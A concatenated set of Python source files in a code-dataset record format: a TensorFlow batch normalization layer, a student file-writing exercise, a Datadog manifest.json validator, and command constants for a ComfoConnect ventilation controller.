shape=(param_dim,),
initializer=self.moving_mean_initializer,
trainable=False)
self.moving_variance = self.add_variable(
name='moving_variance',
shape=(param_dim,),
initializer=self.moving_variance_initializer,
trainable=False)
self._one_minus_decay = 1.0 - self.momentum
if self.renorm:
# Create variables to maintain the moving mean and standard deviation.
# These are used in training and thus are different from the moving
# averages above. The renorm variables are colocated with moving_mean
# and moving_variance.
# NOTE: below, the outer `with device` block causes the current device
# stack to be cleared. The nested ones use a `lambda` to set the desired
# device and ignore any devices that may be set by the custom getter.
def _renorm_variable(name, shape):
var = self.add_variable(name=name,
shape=shape,
initializer=init_ops.zeros_initializer(),
trainable=False)
return var
with ops.device(None):
device = ((lambda _: self.moving_mean.device)
if context.in_graph_mode() else self.moving_mean.device)
with ops.device(device):
self.renorm_mean = _renorm_variable('renorm_mean', (param_dim,))
self.renorm_mean_weight = _renorm_variable('renorm_mean_weight', ())
# We initialize renorm_stddev to 0, and maintain the (0-initialized)
# renorm_stddev_weight. This allows us to (1) mix the average
# stddev with the minibatch stddev early in training, and (2) compute
# the unbiased average stddev by dividing renorm_stddev by the weight.
device = ((lambda _: self.moving_variance.device)
if context.in_graph_mode() else self.moving_variance.device)
with ops.device(device):
self.renorm_stddev = _renorm_variable('renorm_stddev', (param_dim,))
self.renorm_stddev_weight = _renorm_variable(
'renorm_stddev_weight', ())
finally:
if partitioner:
self._scope.set_partitioner(partitioner)
self.built = True
def _assign_moving_average(self, variable, value, one_minus_decay):
with ops.name_scope(None, 'AssignMovingAvg',
[variable, value, one_minus_decay]) as scope:
with ops.colocate_with(variable):
update_delta = (variable.read_value() - value) * one_minus_decay
if isinstance(variable, resource_variable_ops.ResourceVariable):
# state_ops.assign_sub does an extra read_variable_op after the
# assign. We avoid that here.
return gen_resource_variable_ops.assign_sub_variable_op(
variable.handle, update_delta, name=scope)
else:
return state_ops.assign_sub(variable, update_delta, name=scope)
def _fused_batch_norm(self, inputs, training):
"""Returns the output of fused batch norm."""
beta = self.beta if self.center else self._beta_const
gamma = self.gamma if self.scale else self._gamma_const
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
epsilon=self.epsilon,
data_format=self._data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=self.moving_mean,
variance=self.moving_variance,
epsilon=self.epsilon,
is_training=False,
data_format=self._data_format)
output, mean, variance = utils.smart_cond(
training, _fused_batch_norm_training, _fused_batch_norm_inference)
if not self._bessels_correction_test_only:
# Remove Bessel's correction to be consistent with non-fused batch norm.
# Note that the variance computed by fused batch norm is
# with Bessel's correction.
sample_size = math_ops.cast(
array_ops.size(inputs) / array_ops.size(variance), variance.dtype)
factor = (sample_size - math_ops.cast(1.0, variance.dtype)) / sample_size
variance *= factor
training_value = utils.constant_value(training)
if training_value is None:
one_minus_decay = _smart_select(training,
lambda: self._one_minus_decay,
lambda: 0.)
else:
one_minus_decay = self._one_minus_decay
if training_value or training_value is None:
mean_update = self._assign_moving_average(self.moving_mean, mean,
one_minus_decay)
variance_update = self._assign_moving_average(self.moving_variance,
variance, one_minus_decay)
if context.in_graph_mode():
# Note that in Eager mode, the updates are already executed when running
# assign_moving_averages. So we do not need to put them into
# collections.
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
return output
def _renorm_correction_and_moments(self, mean, variance, training):
"""Returns the correction and update values for renorm."""
stddev = math_ops.sqrt(variance + self.epsilon)
# Compute the average mean and standard deviation, as if they were
# initialized with this batch's moments.
mixed_renorm_mean = (self.renorm_mean +
(1. - self.renorm_mean_weight) * mean)
mixed_renorm_stddev = (self.renorm_stddev +
(1. - self.renorm_stddev_weight) * stddev)
# Compute the corrections for batch renorm.
r = stddev / mixed_renorm_stddev
d = (mean - mixed_renorm_mean) / mixed_renorm_stddev
# Ensure the corrections use pre-update moving averages.
with ops.control_dependencies([r, d]):
mean = array_ops.identity(mean)
stddev = array_ops.identity(stddev)
rmin, rmax, dmax = [self.renorm_clipping.get(key)
for key in ['rmin', 'rmax', 'dmax']]
if rmin is not None:
r = math_ops.maximum(r, rmin)
if rmax is not None:
r = math_ops.minimum(r, rmax)
if dmax is not None:
d = math_ops.maximum(d, -dmax)
d = math_ops.minimum(d, dmax)
# When not training, use r=1, d=0, and decay=1 meaning no updates.
r = _smart_select(training, lambda: r, lambda: array_ops.ones_like(r))
d = _smart_select(training, lambda: d, lambda: array_ops.zeros_like(d))
decay = _smart_select(training, lambda: self.renorm_momentum, lambda: 1.)
def _update_renorm_variable(var, weight, value):
"""Updates a moving average and weight, returns the unbiased value."""
# Update the variables without zero debiasing. The debiasing will be
# accomplished by dividing the exponential moving average by the weight.
# For example, after a single update, the moving average would be
# (1-decay) * value. and the weight will be 1-decay, with their ratio
# giving value.
# Make sure the weight is not updated until before r and d computation.
value = array_ops.identity(value)
with ops.control_dependencies([value]):
weight_value = array_ops.constant(1., dtype=weight.dtype)
new_var = moving_averages.assign_moving_average(
var, value, decay, zero_debias=False)
new_weight = moving_averages.assign_moving_average(
weight, weight_value, decay, zero_debias=False)
return new_var / new_weight
with ops.colocate_with(self.moving_mean):
new_mean = _update_renorm_variable(self.renorm_mean,
self.renorm_mean_weight,
mean)
with ops.colocate_with(self.moving_variance):
new_stddev = _update_renorm_variable(self.renorm_stddev,
self.renorm_stddev_weight,
stddev)
# Make sqrt(moving_variance + epsilon) = new_stddev.
new_variance = math_ops.square(new_stddev) - self.epsilon
return (r, d, new_mean, new_variance)
def call(self, inputs, training=False):
if self.fused:
return self._fused_batch_norm(inputs, training=training)
# First, compute the axes along which to reduce the mean / variance,
# as well as the broadcast shape to be used for all parameters.
input_shape = inputs.get_shape()
ndim = len(input_shape)
reduction_axes = list(range(len(input_shape)))
del reduction_axes[self.axis]
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis].value
# Determines whether broadcasting is needed.
needs_broadcasting = (sorted(reduction_axes) != list(range(ndim))[:-1])
scale, offset = self.gamma, self.beta
# Determine a boolean value for `training`: could be True, False, or None.
training_value = utils.constant_value(training)
if training_value is not False:
# Some of the computations here are not necessary when training==False
# but not a constant. However, this makes the code simpler.
mean, variance = nn.moments(inputs, reduction_axes)
mean = _smart_select(training,
lambda: mean,
lambda: self.moving_mean)
variance = _smart_select(training,
lambda: variance,
lambda: self.moving_variance)
if self.renorm:
r, d, new_mean, new_variance = self._renorm_correction_and_moments(
mean, variance, training)
# When training, the normalized values (say, x) will be transformed as
# x * gamma + beta without renorm, and (x * r + d) * gamma + beta
# = x * (r * gamma) + (d * gamma + beta) with renorm.
scale = array_ops.stop_gradient(r, name='renorm_r')
offset = array_ops.stop_gradient(d, name='renorm_d')
if self.gamma is not None:
scale *= self.gamma
offset *= self.gamma
if self.beta is not None:
offset += self.beta
else:
new_mean, new_variance = mean, variance
# Update moving averages when training, and prevent updates otherwise.
decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
mean_update = moving_averages.assign_moving_average(
self.moving_mean, new_mean, decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, new_variance, decay, zero_debias=False)
if context.in_graph_mode():
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
else:
mean, variance = self.moving_mean, self.moving_variance
def _broadcast(v):
if needs_broadcasting and v is not None:
# In this case we must explicitly broadcast all parameters.
return array_ops.reshape(v, broadcast_shape)
return v
return nn.batch_normalization(inputs,
_broadcast(mean),
_broadcast(variance),
_broadcast(offset),
_broadcast(scale),
self.epsilon)
def batch_normalization(inputs,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
training=False,
trainable=True,
name=None,
reuse=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None):
"""Functional interface for the batch normalization layer.
Reference: http://arxiv.org/abs/1502.03167
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
Arguments:
inputs: Tensor input.
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Convolution2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
training: Either a Python boolean, or a TensorFlow boolean scalar tensor
(e.g. a placeholder). Whether to return the output in training mode
(normalized with statistics of the current batch) or in inference mode
(normalized with moving statistics). **NOTE**: make sure to set this
parameter correctly, or else your training/inference will not work
properly.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
Returns:
Output tensor.
"""
layer = BatchNormalization(
axis=axis,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
beta_constraint=beta_constraint,
gamma_constraint=gamma_constraint,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_momentum,
fused=fused,
trainable=trainable,
name=name,
_reuse=reuse,
_scope=name)
return layer.apply(inputs, training=training)
# Aliases
BatchNorm = BatchNormalization
batch_norm = batch_normalization
# Helper function
def _smart_select(pred, fn_then, fn_else):
"""Selects fn_then() or fn_else() based on the value of pred.
The purpose of this function is the same as `utils.smart_cond`. However, at
the moment there is a bug (b/36297356) that seems to kick in only when
`smart_cond` delegates to `tf.cond`, which sometimes results in the training
hanging when using parameter servers. This function will output the result
of `fn_then` or `fn_else` if `pred` is known at graph construction time.
Otherwise, it will use `tf.where` which will result in some redundant work
(both branches will be computed but only one selected). However, the tensors
involved will usually be small (means and variances in batchnorm), so the
cost will be small and will not be incurred at all if `pred` is a constant.
Args:
pred: A boolean scalar `Tensor`.
fn_then: A callable to use when pred==True.
fn_else: A callable to use when pred==False.
Returns:
A `Tensor` whose value is fn_then() or fn_else() based on the value of pred.
"""
pred_value = utils.constant_value(pred)
if pred_value:
return fn_then()
elif pred_value is False:
return fn_else()
t_then = array_ops.expand_dims(fn_then(), 0)
t_else = array_ops.expand_dims(fn_else(), 0)
pred = array_ops.reshape(pred, [1])
result = array_ops.where(pred, t_then, t_else)
return array_ops.squeeze(result, [0])
| 45.14172
| 80
| 0.660164
|
4a0f21e5a9a84c62da0796c0c2c45d7aa67d8f7f
| 190
|
py
|
Python
|
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
#Eoin Lees
with open("test b.txt", "w") as f:
data = f.write("test b\n")
print (data)
with open("test b.txt", "w") as f2:
data = f2.write("another line 8\n")
print (data)
| 17.272727
| 39
| 0.563158
|
4a0f2231e97995291bf7da0ac5102cd1f20c9670
| 26,991
|
py
|
Python
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import json
import os
import uuid
import click
import jsonschema
from ....fs import file_exists, read_file, write_file
from ...constants import get_root
from ...git import content_changed
from ...utils import get_metadata_file, parse_version_parts, read_metadata_rows
from ..console import CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success, echo_warning
FIELDS_NOT_ALLOWED_TO_CHANGE = ["integration_id", "display_name", "guid"]
METRIC_TO_CHECK_WHITELIST = {
'openstack.controller', # "Artificial" metric, shouldn't be listed in metadata file.
'riakcs.bucket_list_pool.workers', # RiakCS 2.1 metric, but metadata.csv lists RiakCS 2.0 metrics only.
}
def get_manifest_schema():
return jsonschema.Draft7Validator(
{
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "Integration Manifest Schema",
"description": "Defines the various components of an integration",
"type": "object",
"properties": {
"display_name": {
"description": "The human readable name of this integration",
"type": "string",
"minLength": 1,
},
"maintainer": {
"description": "The email address for the maintainer of this integration",
"type": "string",
"format": "email",
},
"manifest_version": {"description": "The schema version of this manifest", "type": "string"},
"name": {"description": "The name of this integration", "type": "string", "minLength": 1},
"metric_prefix": {
"description": "The prefix for metrics being emitted from this integration",
"type": "string",
},
"metric_to_check": {
"description": "The metric to use to determine the health of this integration",
"oneOf": [{"type": "string"}, {"type": "array", "items": {"type": "string"}}],
},
"creates_events": {"description": "Whether or not this integration emits events", "type": "boolean"},
"short_description": {
"description": "Brief description of this integration",
"type": "string",
"minLength": 1,
"maxLength": 80,
},
"guid": {"description": "A GUID for this integration", "type": "string", "minLength": 1},
"support": {
"description": "The support type for this integration, one of `core`, `contrib`, or `partner`",
"type": "string",
"enum": ["core", "contrib", "partner"],
},
"supported_os": {
"description": "The supported Operating Systems for this integration",
"type": "array",
"items": {"type": "string", "enum": ["linux", "mac_os", "windows"]},
},
"public_title": {
"description": "A human readable public title of this integration",
"type": "string",
"minLength": 1,
},
"categories": {
"description": "The categories of this integration",
"type": "array",
"items": {"type": "string"},
},
"type": {"description": "The type of this integration", "type": "string", "enum": ["check", "crawler"]},
"is_public": {"description": "Whether or not this integration is public", "type": "boolean"},
"integration_id": {
"description": "The string identifier for this integration",
"type": "string",
"pattern": "^[a-z][a-z0-9-]{0,254}(?<!-)$",
},
"assets": {
"description": "An object containing the assets for an integration",
"type": "object",
"properties": {
"monitors": {"type": "object"},
"dashboards": {"type": "object"},
"service_checks": {
"type": "string",
"description": "Relative path to the json file containing service check metadata",
},
"metrics_metadata": {
"type": "string",
"description": "Relative path to the metrics metadata.csv file.",
},
"logs": {
"type": "object",
"properties": {
"source": {
"type": "string",
"description": "The log pipeline identifier corresponding to this integration",
}
},
},
},
"required": ["monitors", "dashboards", "service_checks"],
},
},
"allOf": [
{
"if": {"properties": {"support": {"const": "core"}}},
"then": {
"properties": {"maintainer": {"pattern": "help@datadoghq.com"}},
"not": {
"anyOf": [{"required": ["author"]}, {"required": ["pricing"]}, {"required": ["terms"]}]
},
},
},
{
"if": {"properties": {"support": {"const": "contrib"}}},
"then": {"properties": {"maintainer": {"pattern": ".*"}}},
},
{
"if": {"properties": {"support": {"const": "partner"}}},
"then": {
"properties": {
"maintainer": {"pattern": ".*"},
"author": {
"description": "Information about the integration's author",
"type": "object",
"properties": {
"name": {
"description": "The name of the company that owns this integration",
"type": "string",
},
"homepage": {
"type": "string",
"description": "The homepage of the company/product for this integration",
},
},
},
"pricing": {
"description": "Available pricing options",
"type": "array",
"minItems": 1,
"items": {
"description": "Attributes of pricing plans available for this integration",
"type": "object",
"properties": {
"billing_type": {
"description": "The billing model for this integration",
"type": "string",
"enum": ["flat_fee", "free", "one_time", "tag_count"],
},
"unit_price": {
"description": "The price per unit for this integration",
"type": "number",
},
"unit_label": {
"description": "The friendly, human readable, description of the tag",
"type": "string",
},
"metric": {"description": "The metric to use for metering", "type": "string"},
"tag": {
"description": ("The tag to use to count the number of billable units"),
"type": "string",
},
},
"allOf": [
{
"if": {"properties": {"billing_type": {"const": "tag_count"}}},
"then": {"required": ["unit_price", "unit_label", "metric", "tag"]},
},
{
"if": {"properties": {"billing_type": {"const": "free"}}},
"then": {
"not": {
"anyOf": [
{"required": ["unit_label"]},
{"required": ["metric"]},
{"required": ["tag"]},
{"required": ["unit_price"]},
]
}
},
},
{
"if": {"properties": {"billing_type": {"pattern": "flat_fee|one_time"}}},
"then": {
"not": {
"anyOf": [
{"required": ["unit_label"]},
{"required": ["metric"]},
{"required": ["tag"]},
]
},
"required": ["unit_price"],
},
},
],
},
},
"terms": {
"description": "Attributes about terms for an integration",
"type": "object",
"properties": {
"eula": {
"description": "A link to a PDF file containing the EULA for this integration",
"type": "string",
},
"legal_email": {
"description": "Email of the partner company to use for subscription purposes",
"type": "string",
"format": "email",
"minLength": 1,
},
},
"required": ["eula", "legal_email"],
},
},
"required": ["author", "pricing", "terms"],
},
},
],
"required": [
# Make metric_to_check and metric_prefix mandatory when all integration are fixed
'assets',
'categories',
'creates_events',
'display_name',
'guid',
'integration_id',
'is_public',
'maintainer',
'manifest_version',
'name',
'public_title',
'short_description',
'support',
'supported_os',
'type',
],
}
)
def is_metric_in_metadata_file(metric, check):
"""
Return True if `metric` is listed in the check's `metadata.csv` file, False otherwise.
"""
metadata_file = get_metadata_file(check)
if not os.path.isfile(metadata_file):
return False
for _, row in read_metadata_rows(metadata_file):
if row['metric_name'] == metric:
return True
return False
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Validate `manifest.json` files')
@click.option('--fix', is_flag=True, help='Attempt to fix errors')
@click.pass_context
def manifest(ctx, fix):
"""Validate `manifest.json` files."""
all_guids = {}
root = get_root()
is_extras = ctx.obj['repo_choice'] == 'extras'
is_marketplace = ctx.obj['repo_choice'] == 'marketplace'
ok_checks = 0
failed_checks = 0
fixed_checks = 0
echo_info("Validating all manifest.json files...")
for check_name in sorted(os.listdir(root)):
manifest_file = os.path.join(root, check_name, 'manifest.json')
if file_exists(manifest_file):
display_queue = []
file_failures = 0
file_fixed = False
try:
decoded = json.loads(read_file(manifest_file).strip())
except json.JSONDecodeError as e:
failed_checks += 1
echo_info(f"{check_name}/manifest.json... ", nl=False)
echo_failure("FAILED")
echo_failure(f' invalid json: {e}')
continue
# attributes are valid
errors = sorted(get_manifest_schema().iter_errors(decoded), key=lambda e: e.path)
if errors:
file_failures += 1
for error in errors:
display_queue.append(
(echo_failure, f' {"->".join(map(str, error.absolute_path))} Error: {error.message}')
)
# guid
guid = decoded.get('guid')
if guid in all_guids:
file_failures += 1
output = f' duplicate `guid`: `{guid}` from `{all_guids[guid]}`'
if fix:
new_guid = uuid.uuid4()
all_guids[new_guid] = check_name
decoded['guid'] = new_guid
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `guid`: {new_guid}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
elif not guid or not isinstance(guid, str):
file_failures += 1
output = ' required non-null string: guid'
if fix:
new_guid = uuid.uuid4()
all_guids[new_guid] = check_name
decoded['guid'] = new_guid
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `guid`: {new_guid}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
else:
all_guids[guid] = check_name
# manifest_version
correct_manifest_version = '1.0.0'
manifest_version = decoded.get('manifest_version')
version_parts = parse_version_parts(manifest_version)
if len(version_parts) != 3:
file_failures += 1
if not manifest_version:
output = ' required non-null string: manifest_version'
else:
output = f' invalid `manifest_version`: {manifest_version}'
if fix:
version_parts = parse_version_parts(correct_manifest_version)
decoded['manifest_version'] = correct_manifest_version
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `manifest_version`: {correct_manifest_version}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
if len(version_parts) == 3:
about_exists = os.path.isfile(
os.path.join(root, check_name, 'datadog_checks', check_name, '__about__.py')
)
if version_parts >= [1, 0, 0]:
if 'version' in decoded and about_exists:
file_failures += 1
output = ' outdated field: version'
if fix:
del decoded['version']
display_queue.append((echo_warning, output))
display_queue.append((echo_success, ' removed field: version'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
elif about_exists:
file_failures += 1
output = f' outdated `manifest_version`: {manifest_version}'
if fix:
decoded['manifest_version'] = correct_manifest_version
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `manifest_version`: {correct_manifest_version}'))
if 'version' in decoded:
del decoded['version']
display_queue.append((echo_success, ' removed field: version'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
else:
version = decoded.get('version')
version_parts = parse_version_parts(version)
if len(version_parts) != 3:
file_failures += 1
if not version:
display_queue.append((echo_failure, ' required non-null string: version'))
else:
display_queue.append((echo_failure, f' invalid `version`: {version}'))
# maintainer
if not is_extras and not is_marketplace:
correct_maintainer = 'help@datadoghq.com'
maintainer = decoded.get('maintainer')
if maintainer != correct_maintainer:
file_failures += 1
output = f' incorrect `maintainer`: {maintainer}'
if fix:
decoded['maintainer'] = correct_maintainer
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `maintainer`: {correct_maintainer}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
# name
correct_name = check_name
name = decoded.get('name')
if not isinstance(name, str) or name.lower() != correct_name.lower():
file_failures += 1
output = f' incorrect `name`: {name}'
if fix:
decoded['name'] = correct_name
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `name`: {correct_name}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
# metrics_metadata
metadata_in_manifest = decoded.get('assets', {}).get('metrics_metadata')
metadata_file_exists = os.path.isfile(get_metadata_file(check_name))
if not metadata_in_manifest and metadata_file_exists:
# There is a metadata.csv file but no entry in the manifest.json
file_failures += 1
display_queue.append((echo_failure, ' metadata.csv exists but not defined in the manifest.json'))
elif metadata_in_manifest and not metadata_file_exists:
# There is an entry in the manifest.json file but the referenced csv file does not exist.
file_failures += 1
display_queue.append(
(echo_failure, ' metrics_metadata in manifest.json references a non-existing file.')
)
# metric_to_check
metric_to_check = decoded.get('metric_to_check')
if metric_to_check:
metrics_to_check = metric_to_check if isinstance(metric_to_check, list) else [metric_to_check]
for metric in metrics_to_check:
metric_integration_check_name = check_name
# snmp vendor specific integrations define metric_to_check
# with metrics from `snmp` integration
if check_name.startswith('snmp_') and not metadata_in_manifest:
metric_integration_check_name = 'snmp'
if (
not is_metric_in_metadata_file(metric, metric_integration_check_name)
and metric not in METRIC_TO_CHECK_WHITELIST
):
file_failures += 1
display_queue.append((echo_failure, f' metric_to_check not in metadata.csv: {metric!r}'))
elif metadata_in_manifest and check_name != 'snmp' and not is_marketplace:
# TODO remove exemptions for integrations-extras and marketplace in future
# if we have a metadata.csv file but no `metric_to_check` raise an error
metadata_file = get_metadata_file(check_name)
if os.path.isfile(metadata_file):
for _, row in read_metadata_rows(metadata_file):
# there are cases of metadata.csv files with just a header but no metrics
if row:
file_failures += 1
display_queue.append((echo_failure, ' metric_to_check not included in manifest.json'))
break
# support
if is_extras:
correct_support = 'contrib'
elif is_marketplace:
correct_support = 'partner'
else:
correct_support = 'core'
support = decoded.get('support')
if support != correct_support:
file_failures += 1
output = f' incorrect `support`: {support}'
if fix:
decoded['support'] = correct_support
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `support`: {correct_support}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
# is_public
correct_is_public = True
is_public = decoded.get('is_public')
if not isinstance(is_public, bool):
file_failures += 1
output = ' required boolean: is_public'
if fix:
decoded['is_public'] = correct_is_public
display_queue.append((echo_warning, output))
display_queue.append((echo_success, f' new `is_public`: {correct_is_public}'))
file_failures -= 1
file_fixed = True
else:
display_queue.append((echo_failure, output))
# Ensure attributes haven't changed
# Skip if the manifest is a new file (i.e. new integration)
manifest_fields_changed = content_changed(file_glob=f"{check_name}/manifest.json")
if 'new file' not in manifest_fields_changed:
for field in FIELDS_NOT_ALLOWED_TO_CHANGE:
if field in manifest_fields_changed:
output = f'Attribute `{field}` is not allowed to be modified. Please revert to original value'
file_failures += 1
display_queue.append((echo_failure, output))
else:
display_queue.append(
(echo_info, " skipping check for changed fields: integration not on default branch")
)
if file_failures > 0:
failed_checks += 1
# Display detailed info if file invalid
echo_info(f"{check_name}/manifest.json... ", nl=False)
echo_failure("FAILED")
for display_func, message in display_queue:
display_func(message)
elif not file_fixed:
ok_checks += 1
if fix and file_fixed:
new_manifest = f"{json.dumps(decoded, indent=2, separators=(',', ': '))}\n"
write_file(manifest_file, new_manifest)
# Display detailed info if file has been completely fixed
if file_failures == 0:
fixed_checks += 1
echo_info(f"{check_name}/manifest.json... ", nl=False)
echo_success("FIXED")
for display_func, message in display_queue:
display_func(message)
if ok_checks:
echo_success(f"{ok_checks} valid files")
if fixed_checks:
echo_info(f"{fixed_checks} fixed files")
if failed_checks:
echo_failure(f"{failed_checks} invalid files")
abort()
| 46.697232
| 120
| 0.437961
|
4a0f22dd6009e06d952e7ae241f06dee88b5e406
| 3,661
|
py
|
Python
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 2
|
2021-07-13T07:33:14.000Z
|
2021-07-23T20:15:48.000Z
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 2
|
2021-07-23T20:12:14.000Z
|
2021-07-23T20:13:44.000Z
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 1
|
2021-07-23T18:23:56.000Z
|
2021-07-23T18:23:56.000Z
|
# API contants
FAN_MODE_AWAY = 'away'
FAN_MODE_LOW = 'low'
FAN_MODE_MEDIUM = 'medium'
FAN_MODE_HIGH = 'high'
# Commands
CMD_FAN_MODE_AWAY = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00'
CMD_FAN_MODE_LOW = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x01'
CMD_FAN_MODE_MEDIUM = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x02'
CMD_FAN_MODE_HIGH = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x03'
CMD_MODE_AUTO = b'\x85\x15\x08\x01' #AUTO !!!
CMD_MODE_MANUAL = b'\x84\x15\x08\x01\x00\x00\x00\x00\x01\x00\x00\x00\x01' # MANUAL !!!
CMD_START_SUPPLY_FAN = b'\x85\x15\x07\x01'
CMD_START_EXHAUST_FAN = b'\x85\x15\x06\x01'
CMD_TEMPPROF_NORMAL = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x00'
CMD_TEMPPROF_COOL = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x01'
CMD_TEMPPROF_WARM = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x02'
CMD_BYPASS_ON = b'\x84\x15\x02\x01\x00\x00\x00\x00\x10\x0e\x00\x00\x01'
CMD_BYPASS_OFF = b'\x84\x15\x02\x01\x00\x00\x00\x00\x10\x0e\x00\x00\x02'
CMD_BYPASS_AUTO = b'\x85\x15\x02\x01'
CMD_SENSOR_TEMP_OFF = b'\x03\x1d\x01\x04\x00'
CMD_SENSOR_TEMP_AUTO = b'\x03\x1d\x01\x04\x01'
